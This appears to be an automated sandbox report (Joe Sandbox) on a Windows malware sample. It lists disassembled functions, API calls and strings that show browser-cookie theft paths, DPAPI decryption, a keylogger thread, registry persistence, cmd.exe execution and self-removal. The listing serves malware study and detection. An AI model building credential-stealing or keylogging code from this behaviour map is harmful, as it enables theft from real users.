                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExistsFilePath
                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                    • API String ID: 1174141254-1980882731
                                                                    • Opcode ID: 3f7452b16761e1584c8e2d429d91126a521682e32829e5e9204bb30330905886
                                                                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                    • Opcode Fuzzy Hash: 3f7452b16761e1584c8e2d429d91126a521682e32829e5e9204bb30330905886
                                                                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                    APIs
                                                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                                    Strings
                                                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExistsFilePath
                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                    • API String ID: 1174141254-1980882731
                                                                    • Opcode ID: 6cf461605f9a2c7fe8b2ad0f04ad55fadbe866efa039c7f8a040f60605f6135f
                                                                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                    • Opcode Fuzzy Hash: 6cf461605f9a2c7fe8b2ad0f04ad55fadbe866efa039c7f8a040f60605f6135f
                                                                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                    • wsprintfW.USER32 ref: 0040B1F3
                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EventLocalTimewsprintf
                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                    • API String ID: 1497725170-1359877963
                                                                    • Opcode ID: e4552b0192bd537bdbb23f0e75db06edbf34c480acb40bb552d9b356009e7e4b
                                                                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                    • Opcode Fuzzy Hash: e4552b0192bd537bdbb23f0e75db06edbf34c480acb40bb552d9b356009e7e4b
                                                                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                    APIs
                                                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                    • String ID: Online Keylogger Started
                                                                    • API String ID: 112202259-1258561607
                                                                    • Opcode ID: f8a7b17e7c3246d81eb43e48ef934acb6193cb8673f1007723f8fd73d2d8d99b
                                                                    • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                    • Opcode Fuzzy Hash: f8a7b17e7c3246d81eb43e48ef934acb6193cb8673f1007723f8fd73d2d8d99b
                                                                    • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,00000000,0040F3BB,?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDC2
                                                                    • GetLastError.KERNEL32(?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDCC
                                                                    • __dosmaperr.LIBCMT ref: 0044BDF7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                    • String ID: pWt
                                                                    • API String ID: 2583163307-153276404
                                                                    • Opcode ID: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                                                    • Instruction ID: 6d8ae8a68538518658f59cc4ec35c635b4eb055c917d93d15d596e37dde74a72
                                                                    • Opcode Fuzzy Hash: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                                                    • Instruction Fuzzy Hash: 59010832A0426066E62462399C4577F6749CB92739F2546AFFD14872D3DB6CCC8182D9
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: CryptUnprotectData$crypt32
                                                                    • API String ID: 2574300362-2380590389
                                                                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEventHandleObjectSingleWait
                                                                    • String ID: Connection Timeout
                                                                    • API String ID: 2055531096-499159329
                                                                    • Opcode ID: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
                                                                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                    • Opcode Fuzzy Hash: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
                                                                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Exception@8Throw
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2005118841-1866435925
                                                                    • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                    • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                    APIs
                                                                    • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                                    • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                                                    • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateValue
                                                                    • String ID: pth_unenc
                                                                    • API String ID: 1818849710-4028850238
                                                                    • Opcode ID: 05bf175528813bc9b9993d83c1793f80e43b850aacd1f889012fd8a578c3b476
                                                                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                    • Opcode Fuzzy Hash: 05bf175528813bc9b9993d83c1793f80e43b850aacd1f889012fd8a578c3b476
                                                                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                    • String ID: bad locale name
                                                                    • API String ID: 3628047217-1405518554
                                                                    • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                    • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                                    • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                    • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(0%s), ref: 0041CDA4
                                                                      • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                    • String ID: !D@
                                                                    • API String ID: 186401046-604454484
                                                                    • Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                    • Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                    APIs
                                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteShell
                                                                    • String ID: /C $cmd.exe$open
                                                                    • API String ID: 587946157-3896048727
                                                                    • Opcode ID: 4ad490e0fde3b647c583a86c80413934cd69158f8dfa8dfee57c8354f6faf088
                                                                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                    • Opcode Fuzzy Hash: 4ad490e0fde3b647c583a86c80413934cd69158f8dfa8dfee57c8354f6faf088
                                                                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteDirectoryFileRemove
                                                                    • String ID: hdF$pth_unenc
                                                                    • API String ID: 3325800564-514923600
                                                                    • Opcode ID: a0279363c5a25902ec7a11d25b89e924bfdaaad508c09a6524f83826895f7699
                                                                    • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                                    • Opcode Fuzzy Hash: a0279363c5a25902ec7a11d25b89e924bfdaaad508c09a6524f83826895f7699
                                                                    • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                                    APIs
                                                                    • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                    • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                    • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: TerminateThread$HookUnhookWindows
                                                                    • String ID: pth_unenc
                                                                    • API String ID: 3123878439-4028850238
                                                                    • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                    • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                                    • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                    • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __alldvrm$_strrchr
                                                                    • String ID:
                                                                    • API String ID: 1036877536-0
                                                                    • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                    • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                    • __freea.LIBCMT ref: 100087D5
                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                    Memory Dump Source
